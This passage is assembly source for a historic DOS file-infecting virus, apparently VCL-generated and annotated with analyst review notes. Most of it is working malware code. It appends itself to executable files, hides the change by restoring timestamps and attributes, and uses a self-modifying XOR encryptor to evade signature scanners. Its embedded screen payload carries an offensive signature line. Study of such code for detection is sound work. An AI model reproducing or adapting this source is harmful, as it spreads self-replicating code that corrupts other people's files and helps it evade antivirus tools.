ret ; Return to caller
find_files endp
;-----------------------------------------------------------------------
; infect_file -- append the virus body to the file described by the
; current DTA and patch a 3-byte JMP to it at file offset 0.
; (Historic DOS virus listing, VCL-generated; annotated for analysis.)
; In:   DI = base/delta pointer; every virus variable is addressed as
;            [di + name] (set up outside this view)
;       current DTA (INT 21h/AH=2Fh) describes the candidate file
; Out:  CF = 1 if the file was skipped (too large, already marked) or
;       CF = 0 after a completed infection -- see the final CMP
; Clobbers: AX, BX, CX, DX, SI, flags; set_carry, buffer, new_jump
; DTA offsets used (DOS find-first/next layout): 15h attribute byte,
; 16h time, 18h date, 1Ah size (low word), 1Eh ASCIIZ file name.
; NOTE(review): neither OPEN (3D00h/3D02h) result is checked for CF;
; on failure AX holds a DOS error code that is then used as a handle.
;-----------------------------------------------------------------------
infect_file proc near
mov ah,02Fh ; DOS get DTA address function -> ES:BX
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail (CF=1 on exit)
cmp word ptr [si + 01Ah],(65279 - (finish - start)) ; Low word of size only; high word at 1Ch is ignored
jbe size_ok ; Body still fits under 64K-1 after append
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name in the DTA
int 021h
xchg bx,ax ; BX holds file handle (not checked for error)
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3): the first three bytes
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, 0 bytes from EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h ; DX:AX = file size; only AX (low word) is kept
xchg dx,ax ; Faster than a PUSH AX (AX saved in DX across the close)
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX -> AX = size (low word)
sub ax,finish - start + 3 ; AX = size - (body length + 3): the rel16 an earlier infection would have stored
cmp word ptr [di + buffer + 1],ax ; Infection marker: compare only the JMP displacement word
je infection_done ; If equal then exit (already infected; E9 opcode byte itself is not checked)
mov byte ptr [di + set_carry],1 ; Success -- the file is OK (CF=0 on exit)
add ax,finish - start ; AX = size - 3: rel16 from offset 3 to EOF, where the body will be appended
mov word ptr [di + new_jump + 1],ax ; Construct jump: E9 lo hi
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes (so read-only files can be opened r/w)
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle (not checked for error)
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made; file pointer is at offset 0
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call (encrypt_code uses SI for MOVSB)
call encrypt_code ; Write an encrypted copy of [start,finish) at EOF; BX = handle
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date (timestamp restored to hide the change)
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes (restored from the DTA)
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; set_carry=0 -> borrow -> CF=1 (failed); set_carry=1 -> CF=0
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag (0 = fail/skip, 1 = infected)
buffer db 090h,0CDh,020h ; Buffer for the victim's first three bytes (initial NOP/INT 20h is overwritten by the read)
new_jump db 0E9h,?,? ; New jump to virus: JMP rel16, displacement filled in above
infect_file endp
data00 db "*.EXE",0 ; ASCIIZ search mask (its use is outside this view)
data01 dw 254h ; Purpose not determinable from the visible code
; The following byte block decodes to an embedded COM-style stub followed
; by screen data. Bytes: JMP SHORT / NOP, a few header bytes, the text
; "TheDraw COM file Screen Save", a 1Ah byte, and "Unsupported Video Mode"
; CR LF "$" (a DOS INT 21h/AH=9 string). The code that follows appears to
; query the video mode (INT 10h/AH=0Fh), compare AL with 2, 3 and 7, print
; the message via INT 21h/AH=9 when none match, and otherwise copy the
; screen data to video memory. Presumably a display payload -- the caller
; is not visible here, so treat this as an analyst's reading, not fact.
db 0EBh, 03Dh, 090h, 000h, 064h, 001h, 002h, 000h ; JMP SHORT +3Dh / NOP, header bytes
db 000h, 054h, 068h, 065h, 044h, 072h, 061h, 077h ; "TheDraw"
db 020h, 043h, 04Fh, 04Dh, 020h, 066h, 069h, 06Ch ; " COM fil"
db 065h, 020h, 053h, 063h, 072h, 065h, 065h, 06Eh ; "e Screen"
db 020h, 053h, 061h, 076h, 065h, 01Ah, 055h, 06Eh ; " Save" 1Ah "Un"
db 073h, 075h, 070h, 070h, 06Fh, 072h, 074h, 065h ; "supporte"
db 064h, 020h, 056h, 069h, 064h, 065h, 06Fh, 020h ; "d Video "
db 04Dh, 06Fh, 064h, 065h, 00Dh, 00Ah, 024h, 0B4h ; "Mode" CR LF "$", then code: MOV AH,0Fh ...
db 00Fh, 0CDh, 010h, 0BBh, 000h, 0B8h, 03Ch, 002h ; INT 10h; MOV BX,0B800h; CMP AL,2
db 074h, 018h, 03Ch, 003h, 074h, 014h, 0C6h, 006h ; JE; CMP AL,3; JE; MOV BYTE PTR [..],0
db 003h, 001h, 000h, 0BBh, 000h, 0B0h, 03Ch, 007h ; MOV BX,0B000h; CMP AL,7
db 074h, 008h, 0BAh, 026h, 001h, 0B4h, 009h, 0CDh ; JE; MOV DX,126h; MOV AH,9; INT 21h (print message)
db 021h, 0C3h, 08Eh, 0C3h, 08Bh, 03Eh, 007h, 001h ; RET; MOV ES,BX; MOV DI,[..]
db 0BEh, 0F0h, 001h, 0BAh, 0DAh, 003h, 0B3h, 009h ; MOV SI,1F0h; MOV DX,3DAh (CGA status port); MOV BL,9
db 08Bh, 00Eh, 004h, 001h, 0FCh, 033h, 0C0h, 0ACh ; MOV CX,[..]; CLD; XOR AX,AX; LODSB -- screen-data decoder loop follows
db 03Ch, 01Bh, 075h, 005h, 080h, 0F4h, 080h, 0EBh
db 06Ah, 03Ch, 010h, 073h, 007h, 080h, 0E4h, 0F0h
db 00Ah, 0E0h, 0EBh, 05Fh, 03Ch, 018h, 074h, 013h
db 073h, 01Fh, 02Ch, 010h, 002h, 0C0h, 002h, 0C0h
db 002h, 0C0h, 002h, 0C0h, 080h, 0E4h, 08Fh, 00Ah
db 0E0h, 0EBh, 048h, 08Bh, 03Eh, 007h, 001h, 081h
db 0C7h, 0A0h, 000h, 089h, 03Eh, 007h, 001h, 0EBh
db 03Ah, 08Bh, 0E9h, 0B9h, 001h, 000h, 03Ch, 019h
db 075h, 008h, 0ACh, 08Ah, 0C8h, 0B0h, 020h, 04Dh
db 0EBh, 00Ah, 03Ch, 01Ah, 075h, 007h, 0ACh, 04Dh
db 08Ah, 0C8h, 0ACh, 04Dh, 041h, 080h, 03Eh, 003h
db 001h, 000h, 074h, 013h, 08Ah, 0F8h, 0ECh, 0D0h ; IN AL,DX / retrace wait (waits on port 3DAh bits)
db 0D8h, 072h, 0FBh, 0ECh, 022h, 0C3h, 075h, 0FBh
db 08Ah, 0C7h, 0ABh, 0E2h, 0F1h, 0EBh, 002h, 0F3h ; STOSW into video memory
db 0ABh, 08Bh, 0CDh, 0E3h, 002h, 0E2h, 088h, 0C3h ; ... RET -- end of the stub code
; From here on the bytes look like the screen data consumed by the stub:
; control bytes (18h/19h/1Bh) interleaved with box-drawing characters
; (B3h, B4h, BFh, C4h, D2h, D6h, ...) and blanks (20h).
db 00Fh, 010h, 019h, 04Fh, 018h, 019h, 04Fh, 018h
db 019h, 04Fh, 018h, 019h, 003h, 009h, 01Bh, 0DAh
db 01Ah, 044h, 0C4h, 0BFh, 019h, 004h, 018h, 019h
db 003h, 0B3h, 00Ch, 01Bh, 0D2h, 0C4h, 0C4h, 0BFh
db 020h, 0D6h, 0C4h, 0C4h, 0BFh, 020h, 0D6h, 0C4h
db 0D2h, 0C4h, 0BFh, 020h, 020h, 0D6h, 0C4h, 0D2h
db 0C4h, 0BFh, 020h, 0D2h, 020h, 020h, 0C2h, 020h
db 020h, 0D2h, 0C4h, 0C4h, 0BFh, 020h, 0C4h, 0D2h
db 0C4h, 020h, 0D6h, 0C4h, 0C4h, 0BFh, 020h, 0D2h
db 0C4h, 0C4h, 0BFh, 020h, 0D2h, 0C4h, 0C4h, 0BFh
db 020h, 0D2h, 020h, 020h, 0C2h, 020h, 0D2h, 0C4h
db 0C4h, 0BFh, 020h, 0D6h, 0C4h, 0C4h, 0BFh, 020h
db 0D2h, 009h, 01Bh, 0B3h, 019h, 004h, 018h, 019h
db 003h, 0B3h, 00Ch, 01Bh, 0C7h, 0C4h, 019h, 002h
db 0C7h, 0C4h, 0C4h, 0B4h, 019h, 002h, 0BAh, 019h
db 003h, 0BAh, 020h, 0BAh, 020h, 0B3h, 020h, 0D3h
db 0C4h, 0C4h, 0B4h, 020h, 020h, 0BAh, 020h, 020h
db 0B3h, 020h, 020h, 0BAh, 020h, 020h, 0C7h, 0C4h
db 0C4h, 0B4h, 020h, 0C7h, 0C4h, 0C2h, 0D9h, 020h
db 0C7h, 0C4h, 0C2h, 0D9h, 020h, 0C7h, 0C4h, 0C4h
db 0B4h, 020h, 0C7h, 0C4h, 019h, 002h, 0C7h, 0C4h
db 0C4h, 0B4h, 020h, 0BAh, 009h, 01Bh, 0B3h, 019h
db 004h, 018h, 019h, 003h, 0B3h, 00Ch, 01Bh, 0D0h
db 0C4h, 0C4h, 0D9h, 020h, 0D0h, 020h, 020h, 0C1h
db 019h, 002h, 0D0h, 019h, 003h, 0D0h, 020h, 0D0h
db 020h, 0C1h, 020h, 0D3h, 0C4h, 0C4h, 0D9h, 020h
db 020h, 0D0h, 0C4h, 0C4h, 0D9h, 020h, 0C4h, 0D0h
db 0C4h, 020h, 0D0h, 020h, 020h, 0C1h, 020h, 0D0h
db 020h, 0C1h, 020h, 020h, 0D0h, 020h, 0C1h, 020h
db 020h, 0D0h, 020h, 020h, 0C1h, 020h, 0D0h, 0C4h
db 0C4h, 0D9h, 020h, 0D0h, 020h, 020h, 0C1h, 020h
db 06Fh, 009h, 01Bh, 0B3h, 019h, 004h, 018h, 019h
db 003h, 0B3h, 019h, 014h, 00Eh, 01Bh, 02Dh, 02Dh ; "--" followed by an ASCII text run (a signature line)
db 047h, 047h, 020h, 041h, 06Ch, 06Ch, 069h, 06Eh
db 020h, 026h, 020h, 054h, 068h, 065h, 020h, 054h
db 065h, 078h, 061h, 073h, 020h, 04Eh, 061h, 07Ah
db 069h, 073h, 019h, 013h, 009h, 01Bh, 0B3h, 019h
db 004h, 018h, 019h, 003h, 0C0h, 01Ah, 044h, 0C4h
db 0D9h, 019h, 004h, 018h, 019h, 04Fh, 018h, 019h
db 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh, 018h
db 019h, 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh
db 018h, 019h, 04Fh, 018h, 019h, 04Fh, 018h, 019h
db 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh, 018h
db 019h, 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh
db 018h, 019h, 04Fh, 018h
vcl_marker db "[VCL]",0 ; VCL creation marker -- a fixed, searchable string (useful as a detection signature)
;-----------------------------------------------------------------------
; encrypt_code -- write an XOR-encrypted copy of the virus body
; [start, finish) to the open file and leave the in-memory body intact.
; In:   DI = base/delta pointer; BX = file handle positioned at EOF
; Out:  file extended by (finish - start) bytes; DI preserved
; Clobbers: AX, CX, DX, SI, flags; encrypt_decrypt is patched in place;
;       the bytes at [DI + finish ..] (memory beyond the virus image)
;       are used as scratch for a temporary routine.
; How it works (as far as the visible lines show):
;   1. Key = low word of the BIOS tick count (INT 1Ah/AH=0 -> DX),
;      stored at encrypt_decrypt+9, the imm16 of the XOR in xor_loop.
;   2. Three XORs flip one bit each in encrypt_decrypt's LEA modrm,
;      the XOR modrm and the two INC opcodes, toggling the register
;      used from SI to DI (or back) -- the form alternates on every
;      call; the purpose is not stated in the source.
;   3. A scratch routine is assembled at [BP + finish]: encrypt_decrypt
;      minus its RET, then write_stuff (MOV CX,len / INT 21h), then
;      encrypt_decrypt again with its RET. One CALL therefore encrypts
;      the body, writes it (AH=40h, DX=start, BX=handle preset), and
;      decrypts it back.
; NOTE(review): the patch offsets (+1, +8, +9, +11) are tied to the
; exact encoding of encrypt_decrypt (presumably a 4-byte LEA, 3-byte
; MOV CX,imm16, then the raw XOR); any change there breaks this.
; NOTE(review): a 16-bit, time-derived key plus a cleartext decryptor
; makes this a signature-defeat only; it is trivially reversible.
;-----------------------------------------------------------------------
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code (encrypt_decrypt indexes via BP)
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function (tick count in CX:DX)
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key -> imm16 of the XOR in xor_loop
xor byte ptr [si + 1],8 ; LEA modrm: reg field SI <-> DI
xor byte ptr [si + 8],1 ; XOR modrm: [si] <-> [di]
xor word ptr [si + 11],0101h; The two INCs: INC SI <-> INC DI
lea di,[bp + finish] ; Copy routine into heap (scratch area past the virus body)
mov cx,finish - encrypt_decrypt - 1 ; All but final RET (RET must be the last byte of encrypt_decrypt)
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes (first pass: encrypt)
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write (MOV CX,imm16 = 3 bytes + INT 21h = 2 bytes)
rep movsb ; Copy the bytes (middle: write)
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again (second pass: decrypt, then RET)
mov ah,040h ; DOS write to file function (survives the XOR loop, which does not touch AX)
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code (template bytes only; copied into the scratch routine, never executed here)
int 021h
encrypt_code endp
end_of_code label near
;-----------------------------------------------------------------------
; encrypt_decrypt -- XOR the region [start_of_code, end_of_code) in
; place with a 16-bit key, one word at a time. Self-inverse: running it
; twice restores the original bytes.
; In:   BP = base/delta pointer (this routine indexes via BP, not DI)
; Out:  region toggled; CX = 0; SI (or DI, see below) points past it
; Clobbers: CX, SI (or DI), flags
; The XOR is emitted as raw bytes (81 34 imm16 = XOR WORD PTR [SI],imm16)
; so its immediate at xor_loop+2 can be patched at run time --
; encrypt_code stores the key there and also XOR-flips this routine's
; modrm/INC bytes, so the index register alternates between SI and DI.
; Only the RET-terminated shape matters to the copier: RET must stay
; the final byte before `finish`.
; NOTE(review): the word count is len/2, so if the region length is odd
; the trailing byte is never encrypted.
; NOTE(review): this routine sits after end_of_code, outside the XOR
; region, so it is stored in clear in every infected file; presumably
; it is the decryptor invoked at entry (the caller is not visible here).
;-----------------------------------------------------------------------
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt (register may be patched to DI)
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length in words (odd tail byte ignored)
xor_loop: db 081h,034h,00h,00h ; XOR WORD PTR [SI],imm16 -- key bytes are patched in by encrypt_code
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through (rel8 branch, so the copied routine works at any address)
ret ; Return to caller (must remain the last byte of this routine)
encrypt_decrypt endp
finish label near
code ends
end main